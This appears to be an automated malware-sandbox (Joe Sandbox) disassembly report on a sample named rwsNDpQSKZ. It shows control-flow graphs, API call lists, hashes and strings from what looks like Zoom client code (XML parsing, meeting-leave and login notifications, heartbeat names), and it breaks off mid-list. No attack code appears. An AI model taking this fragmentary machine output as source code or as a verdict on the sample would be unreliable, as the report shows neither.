                • API String ID: 431132790-1808174911
                • Opcode ID: 4cc4732b821346b6002ffada534de06791ad5dc91a57a18d9660c4fe4143e22b
                • Instruction ID: 0497f96204d271d413363e71103f622dd64466686f79a6d54876469b6c8bdb53
                • Opcode Fuzzy Hash: 4cc4732b821346b6002ffada534de06791ad5dc91a57a18d9660c4fe4143e22b
                • Instruction Fuzzy Hash: D8218E60388344EE86108A26BD02AE835DA6605F04F7C8516B446671F9DFE3794DEE37
                Function 00CB85C0 Relevance: 50.8, APIs: 1, Strings: 28, Instructions: 77COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2412 cb85c0-cb85f3 call ce5365 2415 cb85f9 2412->2415 2416 cb86d8 2412->2416 2418 cb868b-cb8690 2415->2418 2419 cb860a-cb860f 2415->2419 2420 cb86ca-cb86cf 2415->2420 2421 cb86c3-cb86c8 2415->2421 2422 cb8600-cb8605 2415->2422 2423 cb8646-cb864b 2415->2423 2424 cb8684-cb8689 2415->2424 2425 cb865a-cb865f 2415->2425 2426 cb8699-cb869e 2415->2426 2427 cb861e-cb8623 2415->2427 2428 cb8692-cb8697 2415->2428 2429 cb86d1-cb86d6 2415->2429 2430 cb8650-cb8655 2415->2430 2431 cb8614-cb8619 2415->2431 2432 cb8628-cb862d 2415->2432 2433 cb8668-cb866d 2415->2433 2434 cb866f-cb8674 2415->2434 2435 cb86ae-cb86b3 2415->2435 2436 cb8661-cb8666 2415->2436 2437 cb86a0-cb86a5 2415->2437 2438 cb86a7-cb86ac 2415->2438 2439 cb867d-cb8682 2415->2439 2440 cb863c-cb8641 2415->2440 2441 cb86bc-cb86c1 2415->2441 2442 cb8632-cb8637 2415->2442 2443 cb8676-cb867b 2415->2443 2444 cb86b5-cb86ba 2415->2444 2417 cb86dd-cb86eb call c58bfe call ce5333 2416->2417 2418->2417 2419->2417 2420->2417 2421->2417 2422->2417 2423->2417 2424->2417 2425->2417 2426->2417 2427->2417 2428->2417 2429->2417 2430->2417 2431->2417 2432->2417 2433->2417 2434->2417 2435->2417 2436->2417 2437->2417 2438->2417 2439->2417 2440->2417 2441->2417 2442->2417 2443->2417 2444->2417
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: ab_contact_heartbeat$async_record_heartbeat$autoupdate_heartbeat$chat_image_heartbeat$chat_leftlist_heartbeat$chat_msgcontrol_heartbeat$cmmlib_heartbeat$confinstancemgr_heartbeat$confmgr_heartbeat$dmservice_mgr_heartbeat$emoji_countinfo_heartbeat$http_channel_heartbeat$http_runner_heartbeat$lync_download_heartbeat$mainframe_heartbeat$mesh_network_heartbeat$messenger_heartbeat$mpmeetmgr_heartbeat$msg_thread_heartbeat$notification_heartbeat$outlook_ipc_listen_heartbeat$outlook_ipc_server_heartbeat$ptapp_heartbeat$ptapp_msg_heartbeat$undefined_heartbeat$webservice_heartbeat$xmpp_heartbeat$xmpp_pump_heartbeat
                • API String ID: 431132790-3108406362
                • Opcode ID: c2c195530d4616ad8713bc9fa4f6399d04d44b5f0b7b8e30687ce404fe90d337
                • Instruction ID: b065550921be133111434a1717083253c4d368b7a73e67c1f9f34b4c032e30e4
                • Opcode Fuzzy Hash: c2c195530d4616ad8713bc9fa4f6399d04d44b5f0b7b8e30687ce404fe90d337
                • Instruction Fuzzy Hash: 2821836038C324EF86106A276E03EA777AA6714B80F2045577446629C0CEE1594DEF7A
                Function 00CB07A0 Relevance: 47.4, APIs: 25, Strings: 2, Instructions: 186COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2449 cb07a0-cb07c6 call ce5365 ?PushDepth@XMLDocument@tinyxml2@@AAEXXZ 2452 cb09c8-cb09d5 call ce5333 2449->2452 2453 cb07cc-cb07d1 2449->2453 2453->2452 2455 cb07d7-cb07da 2453->2455 2455->2452 2457 cb07e0-cb07f7 ?Identify@XMLDocument@tinyxml2@@QAEPADPADPAPAVXMLNode@2@@Z 2455->2457 2457->2452 2458 cb07fd-cb082f ?Unlock@CState@Cmm@@QAEXXZ 2457->2458 2460 cb09a0-cb09af ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z 2458->2460 2461 cb0835-cb084f ?Unlock@CState@Cmm@@QAEXXZ 2458->2461 2462 cb09b1-cb09bd ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ 2460->2462 2463 cb09c0-cb09c3 ?Reset@StrPair@tinyxml2@@QAEXXZ 2460->2463 2465 cb08b2-cb08cb ?Unlock@CState@Cmm@@QAEXXZ 2461->2465 2466 cb0851-cb0864 ?Unlock@CState@Cmm@@QAEXXZ 2461->2466 2462->2463 2463->2452 2471 cb090b-cb0923 ?InsertEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z ?Reset@StrPair@tinyxml2@@QAEXXZ 2465->2471 2472 cb08cd-cb08d3 2465->2472 2469 cb086a-cb0872 2466->2469 2470 cb0928-cb0939 ?Value@XMLNode@tinyxml2@@QBEPBDXZ 2466->2470 2469->2465 2473 cb0874-cb0888 ?Unlock@CState@Cmm@@QAEXXZ 2469->2473 2474 cb093b-cb094e ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z 2470->2474 2471->2455 2475 cb08d9-cb08df 2472->2475 2476 cb0964-cb0968 2472->2476 2473->2470 2485 cb088e-cb0896 2473->2485 2474->2463 2477 cb08e1-cb08e3 2475->2477 2478 cb08e5-cb08e7 2475->2478 2479 cb096a-cb0970 ?TransferTo@StrPair@tinyxml2@@QAEXPAV12@@Z 2476->2479 2480 cb0975-cb099e ?Unlock@CState@Cmm@@QAEXXZ ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z ?Reset@StrPair@tinyxml2@@QAEXXZ 2476->2480 2481 cb0909 2477->2481 2482 cb08e9-cb0907 ?Value@XMLNode@tinyxml2@@QBEPBDXZ ?GetStr@StrPair@tinyxml2@@QAEPBDXZ ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z 2478->2482 2483 cb0950-cb0962 ?Value@XMLNode@tinyxml2@@QBEPBDXZ 2478->2483 2479->2480 2480->2452 2481->2471 2481->2483 2482->2481 2483->2474 2485->2470 2487 cb089c-cb08b0 ?Unlock@CState@Cmm@@QAEXXZ 2485->2487 2487->2465 2487->2470
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB07A7
                • ?PushDepth@XMLDocument@tinyxml2@@AAEXXZ.RWSNDPQSKZ(00000020), ref: 00CB07B6
                  • Part of subcall function 00CB2A60: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000012,?,Element nesting is too deep.), ref: 00CB2A74
                • ?Identify@XMLDocument@tinyxml2@@QAEPADPADPAPAVXMLNode@2@@Z.RWSNDPQSKZ(?,?,00000020), ref: 00CB07EB
                  • Part of subcall function 00CB0240: ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z.RWSNDPQSKZ(?,?), ref: 00CB0255
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,?,00000020), ref: 00CB081F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB083F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0858
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB087B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB08A3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB08BC
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB08EB
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB08F9
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB08FF
                • ?InsertEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z.RWSNDPQSKZ(?), ref: 00CB0910
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?), ref: 00CB091B
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB092B
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000B,?,XMLDeclaration value=%s,00000000), ref: 00CB093E
                • ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z.RWSNDPQSKZ(?,?,0000000B,?,XMLDeclaration value=%s,00000000), ref: 00CB0946
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB0952
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?TransferTo@StrPair@tinyxml2@@QAEXPAV12@@Z.RWSNDPQSKZ(00000000), ref: 00CB0970
                  • Part of subcall function 00CAFA10: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CAFA20
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0982
                • ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z.RWSNDPQSKZ(?), ref: 00CB098D
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CB0996
                • ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z.RWSNDPQSKZ(?), ref: 00CB09A3
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000F,?,00000000), ref: 00CB09B8
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CB09C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$Node@tinyxml2@@$Pair@tinyxml2@@$Document@tinyxml2@@V12@@$Reset@$DeleteError@Error@2@Node@Value@$Util@tinyxml2@@$Child@Depth@Equal@H_prolog3Identify@InsertNode@2@@PushSkipSpace@Str@StringTransferV12@White
                • String ID: XMLDeclaration value=%s$XMLElement name=%s
                • API String ID: 15653375-38759745
                • Opcode ID: 9f14063b9663b5ce7ec542e3a421d8e378eab44e24a8e7a3b91f03f76d7a4b5a
                • Instruction ID: aadd8fe5a951f42fc237d048664e0c65e08712cba792658b19740a514e881462
                • Opcode Fuzzy Hash: 9f14063b9663b5ce7ec542e3a421d8e378eab44e24a8e7a3b91f03f76d7a4b5a
                • Instruction Fuzzy Hash: 46611974E0021A9FDB15DF64C8919EFB7B5BF48300F244459E826A73A2DB30EE41DBA0
                Function 00CB8800 Relevance: 43.8, APIs: 1, Strings: 24, Instructions: 69COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2547 cb8800-cb8833 call ce5365 2550 cb8839 2547->2550 2551 cb88f0 2547->2551 2552 cb884a-cb884f 2550->2552 2553 cb88aa-cb88af 2550->2553 2554 cb88e9-cb88ee 2550->2554 2555 cb8868-cb886d 2550->2555 2556 cb888e-cb8893 2550->2556 2557 cb88cd-cb88d2 2550->2557 2558 cb88a3-cb88a8 2550->2558 2559 cb88e2-cb88e7 2550->2559 2560 cb8840-cb8845 2550->2560 2561 cb8880-cb8885 2550->2561 2562 cb8887-cb888c 2550->2562 2563 cb88c6-cb88cb 2550->2563 2564 cb88db-cb88e0 2550->2564 2565 cb8879-cb887e 2550->2565 2566 cb88b8-cb88bd 2550->2566 2567 cb88bf-cb88c4 2550->2567 2568 cb885e-cb8863 2550->2568 2569 cb889c-cb88a1 2550->2569 2570 cb8872-cb8877 2550->2570 2571 cb88b1-cb88b6 2550->2571 2572 cb8895-cb889a 2550->2572 2573 cb8854-cb8859 2550->2573 2574 cb88d4-cb88d9 2550->2574 2575 cb88f5-cb8903 call c58bfe call ce5333 2551->2575 2552->2575 2553->2575 2554->2575 2555->2575 2556->2575 2557->2575 2558->2575 2559->2575 2560->2575 2561->2575 2562->2575 2563->2575 2564->2575 2565->2575 2566->2575 2567->2575 2568->2575 2569->2575 2570->2575 2571->2575 2572->2575 2573->2575 2574->2575
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: base_window_create_handler$click_redbadge_action$expand_reply_action$get_thread_data$get_thread_data_handler$init_sessionlist_handler$leftbar_selection_handler$notify_handler$open_bookmark_action$open_bookmark_handler$open_mention_action$open_mention_handler$open_session_action$open_session_handler$send_message_action$session_list_update_handler$sort_leftbar_handler$topbar_resize_handler$undefined_platform$update_unread_handler$webview_js_action$webview_navigate_action$webview_recv_message_handler$zapp_init_handler
                • API String ID: 431132790-3937024713
                • Opcode ID: eabadb8a185a2228730bc19e7c3853aedacdc9027161811e4757a7c319acef3c
                • Instruction ID: 6f9c96af5e82091b9426daf3b2e84e1b8886393849da304eee8b565712e43970
                • Opcode Fuzzy Hash: eabadb8a185a2228730bc19e7c3853aedacdc9027161811e4757a7c319acef3c
                • Instruction Fuzzy Hash: 3A11CB60398346EF8E504A167C0A9E471AA7E04B00FA05D3774466A1C0EEE2C55CFE6A
                Function 00C88350 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 170COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2699 c88350-c88377 call ce5398 call ce4773 ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ 2704 c8837d-c88395 call c5dc01 2699->2704 2705 c885a0 2699->2705 2711 c88399-c883e3 ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z call c584d5 call c57be9 * 2 ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ 2704->2711 2712 c88397 2704->2712 2706 c885a2-c885a7 call ce5347 2705->2706 2719 c883e9-c88404 call c5dc01 2711->2719 2720 c8858e-c8859c ?Unlock@CState@Cmm@@QAEXXZ 2711->2720 2712->2711 2723 c88408-c88451 ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z call c584d5 call c57be9 * 2 call c5de1b 2719->2723 2724 c88406 2719->2724 2720->2705 2723->2720 2733 c88457-c88465 call c5dec4 2723->2733 2724->2723 2733->2720 2736 c8846b-c88479 call c9b84f 2733->2736 2736->2720 2739 c8847f-c8848d call c5dec4 2736->2739 2739->2720 2742 c88493-c884a1 call c9b84f 2739->2742 2742->2720 2745 c884a7-c884b5 call c5de1b 2742->2745 2745->2720 2748 c884bb-c884c9 call c9b84f 2745->2748 2748->2720 2751 c884cf-c884dd call c5df63 2748->2751 2751->2720 2754 c884e3-c884f1 call c9b84f 2751->2754 2754->2720 2757 c884f7-c88505 call c9b84f 2754->2757 2757->2720 2760 c8850b-c88519 call c5dec4 2757->2760 2760->2720 2763 c8851b-c88529 call c5df63 2760->2763 2763->2720 2766 c8852b-c88539 call c9b84f 2763->2766 2766->2720 2769 c8853b-c88549 call c5dec4 2766->2769 2769->2720 2772 c8854b-c88559 call c5dec4 2769->2772 2772->2720 2775 c8855b-c88563 2772->2775 2776 c8856c-c88580 call c5dd85 2775->2776 2777 c88565-c88566 EnterCriticalSection 2775->2777 2780 c88589-c8858c 2776->2780 2781 c88582-c88583 LeaveCriticalSection 2776->2781 2777->2776 2780->2706 2781->2780
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C88357
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69A71), ref: 00C8836B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C8839D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C883DA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.confirmConfLeave,?,-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C8840C
                  • Part of subcall function 00C5DF63: __EH_prolog3_GS.LIBCMT ref: 00C5DF6A
                  • Part of subcall function 00C5DF63: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C5DB2C), ref: 00C5DF80
                  • Part of subcall function 00C5DF63: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C5DB2C), ref: 00C5DFA7
                  • Part of subcall function 00C5DF63: ?SetUInt64@CCmmArchiveVarivant@Cmm@@QAEX_K@Z.RWSNDPQSKZ(00000000,00000000,-00000004,-00000004,?,00000040,00C5DB2C), ref: 00C5DFEE
                  • Part of subcall function 00C5DF63: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,00000000,-00000004,-00000004,?,00000040,00C5DB2C), ref: 00C5DFF6
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C88596
                  • Part of subcall function 00C9B84F: __EH_prolog3_GS.LIBCMT ref: 00C9B856
                  • Part of subcall function 00C9B84F: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C857CC), ref: 00C9B86C
                  • Part of subcall function 00C9B84F: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C857CC), ref: 00C9B893
                  • Part of subcall function 00C9B84F: ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z.RWSNDPQSKZ(00000000,-00000004,-00000004,?,00000040,00C857CC), ref: 00C9B8D9
                  • Part of subcall function 00C9B84F: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,-00000004,-00000004,?,00000040,00C857CC), ref: 00C9B8E1
                  • Part of subcall function 00C5DEC4: __EH_prolog3_GS.LIBCMT ref: 00C5DECB
                  • Part of subcall function 00C5DEC4: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5DEE1
                  • Part of subcall function 00C5DEC4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5DF08
                  • Part of subcall function 00C5DEC4: ?SetUInt32@CCmmArchiveVarivant@Cmm@@QAEXI@Z.RWSNDPQSKZ(00000000,?,-00000004,?,00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?,0000004C), ref: 00C5DF4E
                  • Part of subcall function 00C5DEC4: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,?,-00000004,?,00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?), ref: 00C5DF56
                • EnterCriticalSection.KERNEL32(?,?,-00000004,com.zoom.app.confirmConfLeave,?,-00000004,com.zoom.app.confirmConfLeave), ref: 00C88566
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,com.zoom.app.confirmConfLeave,?,-00000004,com.zoom.app.confirmConfLeave), ref: 00C88583
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$Archive@$Tree$Node@$??0?$String$H_prolog3_$AppendChild@V123@@Varivant@$CriticalInt32@PackageSectionTree@$EnterH_prolog3Int64@LeaveNode@23@Root@State@Unlock@
                • String ID: ArchivingOption$ErrCode$FreeMeetingElapsedTime$InMeetingFlag$IsBasicPlusMeeting$IsHost$IsMeetingShowExtendDialog$JMFLog$Leave$LiveSteamViewUrl$Reason$com.zoom.app.confirmConfLeave$leaveReason$subConfType$subHasError$subSdkError
                • API String ID: 3495133802-1651624624
                • Opcode ID: 47ab1486bc16ce88342fd3ab4479879b6a7b6fbc65e6e2490084f9002c9c9993
                • Instruction ID: b5e8b2c8ff8615b9e71f6c076d07a262143ea34407a883eab516a0ca2e807036
                • Opcode Fuzzy Hash: 47ab1486bc16ce88342fd3ab4479879b6a7b6fbc65e6e2490084f9002c9c9993
                • Instruction Fuzzy Hash: B751E230B006158BDF24FB6099152AEB2B5AF44305F884129EC12AB7C9DF34DF4AD7AD
                Function 00C88A7D Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 170COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2782 c88a7d-c88aa4 call ce5398 call ce4773 ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ 2787 c88aaa-c88ac2 call c5dc01 2782->2787 2788 c88ccd 2782->2788 2794 c88ac4 2787->2794 2795 c88ac6-c88b10 ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z call c584d5 call c57be9 * 2 ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ 2787->2795 2790 c88ccf-c88cd4 call ce5347 2788->2790 2794->2795 2802 c88cbb-c88cc9 ?Unlock@CState@Cmm@@QAEXXZ 2795->2802 2803 c88b16-c88b31 call c5dc01 2795->2803 2802->2788 2806 c88b33 2803->2806 2807 c88b35-c88b7e ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z call c584d5 call c57be9 * 2 call c5dec4 2803->2807 2806->2807 2807->2802 2816 c88b84-c88b92 call c9b84f 2807->2816 2816->2802 2819 c88b98-c88ba6 call c5de1b 2816->2819 2819->2802 2822 c88bac-c88bba call c9b8ee 2819->2822 2822->2802 2825 c88bc0-c88bce call c5de1b 2822->2825 2825->2802 2828 c88bd4-c88be2 call c5de1b 2825->2828 2828->2802 2831 c88be8-c88bf6 call c5de1b 2828->2831 2831->2802 2834 c88bfc-c88c0a call c5de1b 2831->2834 2834->2802 2837 c88c10-c88c1e call c5de1b 2834->2837 2837->2802 2840 c88c24-c88c32 call c5de1b 2837->2840 2840->2802 2843 c88c38-c88c46 call c5de1b 2840->2843 2843->2802 2846 c88c48-c88c56 call c5de1b 2843->2846 2846->2802 2849 c88c58-c88c66 call c5de1b 2846->2849 2849->2802 2852 c88c68-c88c76 call c5de1b 2849->2852 2852->2802 2855 c88c78-c88c86 call c5de1b 2852->2855 2855->2802 2858 c88c88-c88c90 2855->2858 2859 c88c99-c88cad call c5dd85 2858->2859 2860 c88c92-c88c93 EnterCriticalSection 2858->2860 2863 c88caf-c88cb0 LeaveCriticalSection 2859->2863 2864 c88cb6-c88cb9 2859->2864 2860->2859 2863->2864 2864->2790
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C88A84
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69F92), ref: 00C88A98
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88ACA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88B07
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyPTLoginInfo,?,-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88B39
                  • Part of subcall function 00C5DE1B: __EH_prolog3_GS.LIBCMT ref: 00C5DE22
                  • Part of subcall function 00C5DE1B: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5DE38
                  • Part of subcall function 00C5DE1B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5DE5F
                  • Part of subcall function 00C5DE1B: ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ.RWSNDPQSKZ(?,-00000004,?,00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7), ref: 00C5DEA3
